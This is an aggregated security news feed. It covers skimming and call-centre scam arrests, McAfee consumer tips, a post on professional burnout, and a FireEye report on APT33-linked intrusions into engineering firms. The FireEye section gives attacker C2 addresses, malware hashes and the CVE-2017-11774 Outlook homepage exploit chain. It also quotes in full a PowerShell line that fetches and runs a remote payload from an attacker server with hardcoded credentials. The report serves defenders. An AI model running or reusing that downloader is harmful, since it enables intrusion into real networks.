- Mike Rothman (0) Comments Subscribe to our daily email digest

OODA: Observe Orient Decide Act Faster Than Your Adversaries

OODA is the famous fast-paced decision-making model that emphasizes out-thinking your adversaries. First captured by Colonel John Boyd to articulate fighter pilot success models, it has been applied to international business, cyber security and just about any competitive environment.

Applying OODA methodologies to your business can help accelerate your products to market and help you beat the competition. This is especially important in the age of ubiquitous computing we all find ourselves in.

OODA is also the name of a new consultancy designed to optimize your actions.

The consultancy OODA helps clients identify, manage, and respond to global risks and uncertainties while exploring emerging opportunities and developing robust and adaptive strategies for the future.

OODA is comprised of a unique team of international experts lead by co-founders Matt Devost and Bob Gourley. Matt and Bob have been collaborating for two decades on advanced technology, intelligence, and security issues.  Our team is capable of providing advanced intelligence and analysis, strategy and planning support, investment and due diligence, risk and threat management, training, decision support, crisis response, and security services to global corporations and governments.

For more see:


The post OODA: Observe Orient Decide Act Faster Than Your Adversaries appeared first on The Cyber Threat.

Why your cloud business needs FedRAMP certification

Now more than ever, FedRAMP certification will put your cloud services or SaaS solution head and shoulders above the competition. The Federal Risk and Authorization Management Program, or FedRAMP, was designed to support the federal government’s “cloud-first” initiative by making it easier for federal agencies to contract with vendors that provide SaaS solutions and other… Read More

The post Why your cloud business needs FedRAMP certification appeared first on .

Arizona Rush to Adopt Driverless Cars Devolves Into Pedestrian War

Look, I’m not saying I have predicted this exact combat scenario for several years as described in my presentations (and sadly it also was my Kiwicon talk proposal for this year), I’m just openly wondering at this point why Arizona’s rabidly pro-gun legislators didn’t argue driverless cars are protected by Waymo’s 2nd Amendment right to … Continue reading Arizona Rush to Adopt Driverless Cars Devolves Into Pedestrian War

Alert Traffic Patrolman Unveils Romanian Skimming Ring

Clinton, Mississippi doesn't sound like the kind of place where an international skimming operation would be operating.  With a population of barely 25,000, the town in southwest Mississippi does have one thing that helped - an alert police dispatcher.

Cheatham County, Tennessee, on the west side of Nashville, also doesn't seem like a cyber crime Metropolis.  But they also had something critical to this type of police work.  An alert traffic cop, Cheatham County Deputy Paul Ivy.

Clinton is more than a six hour drive from where a Cheatham County Sheriff's deputy pulled over a suspicious vehicle on December 12th as they were about to pull on to Interstate 40 headed west.  The deputy had seen the 2005 Chevy Trailblazer parked at a Shell gas station and noticed a temporary license tag displayed in an unreadable manner behind a tinted windshield.   The driver, Forrest Beard, showed the officer a Mississippi drivers license which came back as suspended.  Beard's story of the two other occupants of the car, "Mike" who had met at a party four months ago, and another man who he had only known for a couple weeks seemed odd.  He consented to a vehicle search, which revealed "a large amount of money", a credit card terminal, two laptops, credit card skimmers, and a stack of 159 Walmart gift cards.  Most of the materials were hidden in Nike shoe boxes.

Vehicle search items discovered
Labels added to the photo by Security Researcher Silas Cutler

The other two men in the car had unusual forms of identification for Kingston Springs, Tennessee.  George Zica was from Romania, according to his passport.

George Zica (Cheatham County Sheriff's Office)
Madalin Palanga (Cheatham County Sheriff's Office)
Madalin "Mike" Palanga was also from Romania, but the id he was carrying was a counterfeit Czech Republic identity card in the name of Vaclav Kubisov.

The officer contacted the Secret Service, and they ended up keeping the vehicle, the money, the computers, and all three men's cell phones.  On Wednesday, December 19th, a judge posted a bail order for the men, and Madalin bonded out for $74,999, although he is wearing a GPS-tracking ankle bracelet, before a hold order was received from Mississippi, preventing the other two men from doing the same.

Further investigation revealed that the men had been tied to skimming cases across middle Tennessee, but also in North Carolina and South Carolina, but Mississippi added one critical piece of evidence, courtesy of ATM footage from Regions Bank.  On Tuesday, Regions Bank employees contacted the Clinton, Mississippi police to let them know they had "trapped" some cards in the local Regions ATM.  When Regions receives fraud reports indicating one of their accounts has been compromised, their policy is to capture any ATM card put into one of their ATMs that uses that account information.

In this case, the captured cards were both Walmart gift cards.  In this case, the Skimmers were "Verifone" terminal overlays, commonly found in many gas stations and convenience stores at the counter.  After criminals modify the keypad by installing a skimmer, a device placed in front of the card slot makes a copy of the magnetic stripe, while the fake keypad overlay captures the PIN number when the customer puts in their four digit code.  The information can be retrieved wirelessly from a vehicle in the parking lot.

(Video from Andy Cordan, WKRN TV News)

In Clinton, Mississippi, over $13,000 in fraudulent ATM charges had been reported recently, with most of the stolen card data being tracked to customers in the Memphis, Tennessee area.

Regions Bank provided ATM Surveillance camera footage to the Clinton police.  An alert police dispatcher who was reviewing the material started comparing the image to other recent credit card crimes in the South East and determined that the man in the ATM footage was George Zica, who was arrested later that week in Tennessee as described above.  (The timestamp on the video is confusing.)

126 Arrests: The Emergence of India’s Cyber Crime Detectives Fighting Call Center Scams

The Times of India reports that police have raided a call center in Noida Sector 63 where hundreds of fraud calls were placed every day to Americans and Canadians resulting in the theft of $50,000 per day.

 The scammers had rented four floors of a building being operated by two scammers from Gurgaon, Narendra Pahuja and Jimmy Ashija. Their boss, who was not named by the police, allegedly operates at least five call centers. In the raid this week, 126 employees were arrested and police seized 312 workstations, as well as Rs 20 lakh in cash (about $28,500 USD).

Times of India photo 

Noida police have been cooperating very well with international authorities, as well as Microsoft, leading to more than 200 people arrested in Noida and "scores" of fake call centers shut down, including four in Sector 63.  (In a case just last month, another call center was said to have stolen from 300 victims, after using online job sites and to recruit young money seekers by having them work conducting the scams. )

In the current scam, callers already had possession of the victim's Social Security Number and full name.  This information was used to add authority to their request, which got really shady really fast.  The victim was instructed to purchase Apple iTunes Gift Cards, or Google Play Gift Cards, scratch the numbers, and read them to the call center employee.  The money was laundered through a variety of businesses in China and India before cashing out to bank accounts belonging to Pahuja and Ashija.

 Go to Tweet
Noida police are advancing in their Cyber Crime skills!

As more and more cyber crime enterprises spring up in India, the assistance of their new Centers for Cyber Crime Investigation thtat are becoming more critical to stopping fraud against Americans:

We applaud the Center for Cyber Crime Investigation in Noida

The US Embassy was quick to acknowledge the support of the newest cyber crime partners of the United States after their action at the end of November:

US Embassy to India thanks the Noida and Gurgaon Police for their help!
Another recent Times of India story from November 30, 2018, "Bogus Call Centres and Pop-up Virus Alerts - a Global Cyber Con Spun up in NCR" [NCR = National Capital Region] had more details of this trend, including this graphic:

That's at least 50 call centers shutdown just in these two regions, but with this weeks' 126 arrests being the culmination of an on-going investigation, receiving data from both the FBI and Microsoft.

Local news of India reported the names of some of the gang members held in the November 29-30th action in their story नोएडा: बड़ी कंपनियों में नौकरी दिलाने के नाम पर करते थे धोखाधड़ी, 8 गिरफ्तार (Noida: Fraud, 8 arrested for giving fake jobs in the name of big companies).

Sontosh Gupta, who was the ring leader, was previously employed by an online job site, but then created his own site,  vintechjobs (dot) com, which he used to attract call center employees, many of whom were duped into serving as his scammer army without ever being compensated for their work!

Others arrested then included Mohan Kumar, Paritosh Kumar, Jitendra Kumar, Victor, Himanshu, Ashish Jawla, and Jaswinder.

During that same two day raid, police swept through at least sixteen other call centers, according to this New York Times story, "That Virus Alert on Your Computer? Scammers in India May Be Behind It"
Ajay Pal Sharma, the senior superintendent of police, told the NYT that 50 of his officers swept through eight different call centers in Gautam Budh Nagar as part of the case.  Microsoft's Digital Crimes Unit told the Times that with 1.2 million people generating $28 Billion in India working for call centers, it isn't hard to disguise the shady callers among the legitimate businesses.

The problem is not unique to Delhi and the National Capital Region suburbs that are the current focus.  Back in July, Mumbai was in the headlines, as a massive IRS-imitating Call Center ring was broken up with the help of more great cyber crime investigators from India:

Madan Ballal, Thane Crime Branch, outside Mumbai
Police Inspector Madan Ballal had his story told as the focus of an article in Narratively, "This Indian Cop Took Down a Massive IRS Call-Center Scam".

Much more investigating and arresting needs to be done, but it is a great sign that the problem is now receiving help from an emerging new generation of Indian Cybercrime Detectives!

The #1 Gift Parents Can Give Their Kids This Christmas

quality time with kidsYou won’t see this gift making the morning shows as being among the top hot gifts of 2018. It won’t make your child’s wish list, and you definitely won’t have to fight through mall crowds to try to find it.

Even so, it is one of the most meaningful gifts you can give your child this year. It’s the gift of your time.

If we are honest, as parents, we know we need to be giving more of this gift every day. We know in our parenting “knower” that if we were to calculate the time we spend on our phones, it would add up to days — precious days — that we could be spending with our kids.

So this holiday season, consider putting aside your phone and leaning into your family connections. Try leaving your phone in a drawer or in another room. And, if you pick it up to snap a few pictures, return it to it’s hiding place and reconnect to the moment.

This truism from researchers is worth repeating: Too much screen time can chip away at our relationships. And for kids? We’ve learned too much tech can lead to poor grades, anxiety, obesity, and worse — feelings of hopelessness and depression.

Putting the oodles of knowledge we now have into action and transforming the family dynamic is also one of the most priceless gifts you can give yourself this year.

Here are a few ideas to inspire you forward:

  1. Take time seriously. What if we took quality time with family as seriously as we do other things? What if we booked time with our family and refused to cancel it? It’s likely our dearest relationships would soon reflect the shift. Get intentional by carving out time. Things that are important end up on the calendar so plan time together by booking it on the family calendar. Schedule time to play, make a meal together, do a family project, or hang out and talk.quality time with kids
  2. Green time over screen time. Sure it’s fun to have family movie marathons over the break but make sure you get your green time in. Because screen time can physically deplete our senses, green time — time spent outdoors — can be a great way to increase quality time with your family and get a hefty dose of Vitamin D.
  3. Aim for balance. The secret sauce of making any kind of change is balance. If there’s too much attention toward technology this holiday (yours or theirs), try a tech-exchange by trading a half-day of tech use for a half-day hike or bike ride, an hour of video games for an hour of family time. Balance wins every time, especially when quality time is the goal.
  4. Balance new gadget use. Be it a first smartphone, a new video game, or any other new tech gadget, let your kids have fun but don’t allow them to isolate and pull away from family. Balance screen time with face-to-face time with family and friends to get the most out of the holidays. Better yet: Join them in their world — grab a controller and play a few video games or challenge them to a few Fortnite battles.
  5. Be okay with the mess. When you are a parent, you know better than most how quickly the days, months, and years can slip by until — poof! — the kids are grown and gone. The next time you want to spend a full Saturday on chores, think about stepping over the mess and getting out of the house for some fun with your kids.

Here’s hoping you and your family have a magical holiday season brimming with quality time, laughter, and beautiful memories — together.

The post The #1 Gift Parents Can Give Their Kids This Christmas appeared first on McAfee Blogs.

Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat

As the Internet of Things works its way into almost every facet of our daily lives, it becomes more important to safeguard the IoT devices we bring into our homes. One device that has become increasingly popular among consumers is the drone. These remote-controlled quadcopters have enhanced the work of photographers and given technology buffs a new hobby, but what happens when these flying robots cause a safety hazard for others? That’s exactly what happened at the Gatwick airport on Wednesday night and again today when two drones were spotted flying over the airfield, causing all departing flights to remain grounded and all arriving flights to be diverted to other airports.

The drones were spotted flying over the Gatwick airport’s perimeter fence into the area where the runway operates from. This disruption affected 10,000 passengers on Wednesday night, 110,000 passengers on Thursday, and 760 flights expected to arrive and depart on Thursday. More than 20 police units were recruited to find the drone’s operator so the device could be disabled. The airport closure resulted in 31.9 hours with no planes taking off or landing between Wednesday and Thursday.

You might be wondering, how could two drones cause an entire airport to shut down for so long? It turns out that drones can cause serious damage to an aircraft. Evidence suggests that drones could inflict more damage than a bird collision and that the lithium-ion batteries that power drones could become lodged in airframes, potentially starting a fire. And while the probability of a collision is small, a drone could still be drawn into an aircraft turbine, putting everyone on board at risk. This is why it’s illegal to fly a drone within one kilometer of an airport or airfield boundary. What’s more, endangering the safety of an aircraft is a criminal offense that could result in a five-year prison sentence.

Now, this is a lesson for all drone owners everywhere to be cognizant of where they fly their devices. But beyond the physical implications that are associated with these devices, there are digital ones too — given they’re internet-connected. In fact, to learn about how vulnerable these devices can be, you can give our latest episode of “Hackable?” a listen, which explores the physical and digital implications of compromised drones,

Therefore, if you get a drone for Christmas this year, remember to follow these cybersecurity tips to ensure you protect them on the digital front.

  • Do your research. There are multiple online communities that disclose bugs and potential vulnerabilities as well as new security patches for different types of drones. Make sure you stay informed to help you avoid potential hacks.
  • Update, update, update! Just as it’s important to update your apps and mobile devices, it’s also important to update the firmware and software for your drone. Always verify the latest updates with your drone manufacturer’s website to make sure it is legitimate.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat appeared first on McAfee Blogs.

Managing Burnout

This is not strictly an information security post, but the topic likely affects a decent proportion of my readership.

Within the last few years I experienced a profound professional "burnout." I've privately mentioned this to colleagues in the industry, and heard similar stories or requests for advice on how to handle burnout.

I want to share my story in the hopes that it helps others in the security scene, either by coping with existing burnout or preparing for a possible burnout.

How did burnout manifest for me? It began with FireEye's acquisition of Mandiant, almost exactly five years ago. 2013 was a big year for Mandiant, starting with the APT1 report in early 2013 and concluding with the acquisition in December.

The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye's culture and managerial habits, and I wondered what I was doing inside such a different company.

(It's important to note that the appointment of Kevin Mandia as CEO in June 2016 began a cultural and managerial shift. I give Kevin and his lieutenants credit for helping transform the company since then. Kevin's appointment was too late for me, but I applaud the work he has done over the last few years.)

Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.

At this time I was also working on my PhD with King's College London. I had added this stress myself, but I felt like I could manage it. I had earned two major and two minor degrees in four years as an Air Force Academy cadet. Surely I could write a thesis!

Late in 2015 I realized that I needed to balance the very cerebral art of information security with a more physical activity. I took a Krav Maga class the first week of January 2016. It was invigorating and I began a new blog, Rejoining the Tao, that month. I began to consider options outside of informations security.

In early 2016 my wife began considering ways to rejoin the W-2 workforce, after having stayed home with our kids for 12 years. We discussed the possibility of me leaving my W-2 job and taking a primary role with the kids. By mid-2016 she had a new job and I was open to departing FireEye.

By late 2016 I also realized that I was not cut out to be a PhD candidate. Although I had written several books, I did not have the right mindset or attitude to continue writing my thesis. After two years I quit my PhD program. This was the first time I had quit anything significant in my life, and it was the right decision for me. (The Churchill "never, never, never give up" speech is fine advice when defending your nation's existence, but it's stupid advice if you're not happy with the path you're following.)

In March 2017 I posted Bejtlich Moves On, where I said I was leaving FireEye. I would offer security consulting in the short term, and would open a Krav Maga school in the long-term. This was my break with the security community and I was happy to make it. I blogged on security only five more times in 2017.

(Incidentally, one very public metric for my burnout experience can be seen in my blog output. In 2015 I posted 55 articles, but in 2016 I posted only 8, and slightly more, 12, in 2017. This is my 21st post of 2018.)

I basically took a year off from information security. I did some limited consulting, but Mrs B paid the bills, with some support from my book royalties and consulting. This break had a very positive effect on my mental health. I stayed aware of security developments through Twitter, but I refused to speak to reporters and did not entertain job offers.

During this period I decided that I did not want to open a Krav Maga school and quit my school's instructor development program. For the second time, I had quit something I had once considered very important.

I started a new project, though -- writing a book that had nothing to do with information security. I will post about it shortly, as I am finalizing the cover with the layout team this weekend!

By the spring of 2018 I was able to consider returning to security. In May I blogged that I was joining Splunk, but that lasted only two months. I realized I had walked into another cultural and managerial mismatch. Near the end of that period, Seth Hall from Corelight contacted me, and by July 20th I was working there. We kept it quiet until September. I have been very happy at Corelight, finally finding an environment that matches my temperament, values, and interests.

My advice to those of you who have made it this far:

If you're feeling burnout now, you're not alone. It happens. We work in a stressful industry that will take everything that you can give, and then try to take more. It's healthy and beneficial to push back. If you can, take a break, even if it means only a partial break.

Even if you can't take a break, consider integrating non-security activities into your lifestyle -- the more physical, the better. Security is a very cerebral activity, often performed in a sedentary manner. You have a body and taking care of it will make your mind happier too.

If you're not feeling burnout now, I recommend preparing for a possible burnout in the future. In addition to the advice in the previous paragraphs, take steps now to be able to completely step away from security for a defined period. Save a proportion of your income to pay your bills when you're not working in security. I recommend at least a month, but up to six months if you can manage it.

This is good financial advice anyway, in the event you were to lose your job. This is not an emergency fund, though -- this is a planned reprieve from burnout. We are blessed in security to make above-average salaries, so I suggest saving for retirement, saving for layoffs, and saving for burnout.

Finally, it's ok to talk to other people about this. This will likely be a private conversation. I don't see too many people saying "I'm burned out!" on Twitter or in a blog post. I only felt comfortable writing this post months after I returned to regular security work.

I'm very interested in hearing what others have to say on this topic. Replying to my Twitter announcement for the blog post is probably the easiest step. I moderate the comments here and might not get to them in a timely manner.

Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat

With the holidays rapidly approaching, many consumers are receiving order confirmation emails updating them on their online purchases for friends and family. What they don’t expect to see is an email that appears to be a purchase confirmation from the Apple App Store containing a PDF attachment of a receipt for a $30 app. This is actually a stealthy phishing email, which has been circulating the internet, prompting users to click on a link if the transaction was unauthorized.

So how exactly does this phishing campaign work? In this case, the cybercriminals rely on the victim to be thrown off by the email stating that they purchased an app when they know that they didn’t. When the user clicks on the link in the receipt stating that the transaction was unauthorized, they are redirected to a page that looks almost identical to Apple’s legitimate Apple Account management portal. The user is prompted to enter their login credentials, only to receive a message claiming that their account has been locked for security reasons. If the user attempts to unlock their account, they are directed to a page prompting them to fill out personal details including their name, date of birth, and social security number for “account verification.”

Once the victim enters their personal and financial information, they are directed to a temporary page stating that they have been logged out to restore access to their account. The user is then directed to the legitimate Apple ID account management site, stating “this session was timed out for your security,” which only helps this attack seem extra convincing. The victim is led to believe that this process was completely normal, while the cybercriminals now have enough information to perform complete identity theft.

Although this attack does have some sneaky behaviors, there are a number of steps users can take to protect themselves from phishing scams like this one:

  • Be wary of suspicious emails. If you receive an email from an unknown source or notice that the “from” address itself seems peculiar, avoid interacting with the message altogether.
  • Go directly to the source. Be skeptical of emails claiming to be from companies asking to confirm a purchase that you don’t recognize. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Use a comprehensive security solution. It can be difficult to determine if a website, link, or file is risky or contains malicious content. Add an extra layer of security with a product like McAfee Total Protection.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat appeared first on McAfee Blogs.

OVERRULED: Containing a Potentially Destructive Adversary


FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and Aerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and destructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is available within our intelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.

Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1) as shown in Figure 2.

Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

  • Username and domain
  • Computer name
  • CPU details
  • Current exe PID
  • Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success with interacting with POWERTON during this time.  The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.

Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell "DownloadString" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”.  During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a public discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).

Table 1 contains the operational timeline for the activity we analyzed.




2017-08-15 17:06:59

APT33 – EMPIRE (Used)


2017-09-15 16:49:59

APT33 – PUPYRAT (Compiled)


2017-11-12 20:42:43

GroupA – AUT2EXE Downloader (Compiled)


2017-11-14 14:55:14

GroupA – PUPYRAT (Used)


2018-01-09 19:15:16

APT33 – PUPYRAT (Compiled)


2018-02-13 13:35:06

APT33 – PUPYRAT (Used)


2018-05-09 18:28:43

GroupB – AUT2EXE (Compiled)


2018-07-02 07:57:40

APT33 – POSHC2 (Used)


2018-07-16 00:33:01

GroupB – POSHC2 (Compiled)


2018-07-16 01:39:58

GroupB – POSHC2 (Used)


2018-07-16 08:36:13

GroupB – POWERTON (Used)


2018-07-31 22:09:25

APT33 – POSHC2 (Used)


2018-08-06 16:27:05

GroupB – POSHC2 (Compiled)


2018-08-07 05:10:05

GroupB – POSHC2 (Used)


2018-08-29 18:14:18

APT33 – POSHC2 (Used)


2018-10-09 16:02:55

APT33 – POSHC2 (Used)


2018-10-09 16:48:09

APT33 – POSHC2 (Used)


2018-10-11 21:29:22

GroupB – POWERTON (Used)


2018-12-13 11:00:00

GroupB – POWERTON (Identified)


Table 1: Operational Timeline

Outlook and Implications

If the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.

We will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.

Custom Backdoor: POWERTON

POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers.

FireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.

Table 2 contains samples of POWERTON.

Hash of Obfuscated File (MD5)

Hash of Deobfuscated File (MD5)























Table 2: POWERTON malware samples

Adversary Methods: Email Exploitation on the Rise

Outlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor authentication at FireEye Cyber Defense Summit 2018.

At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.

An adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:

  • Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?
  • Previous compromise within your organization where credentials were compromised but not identified or reset.
  • Poor password choice or password security policies resulting in brute-forced credentials.
  • Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents intended to phish them from users.
  • Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.

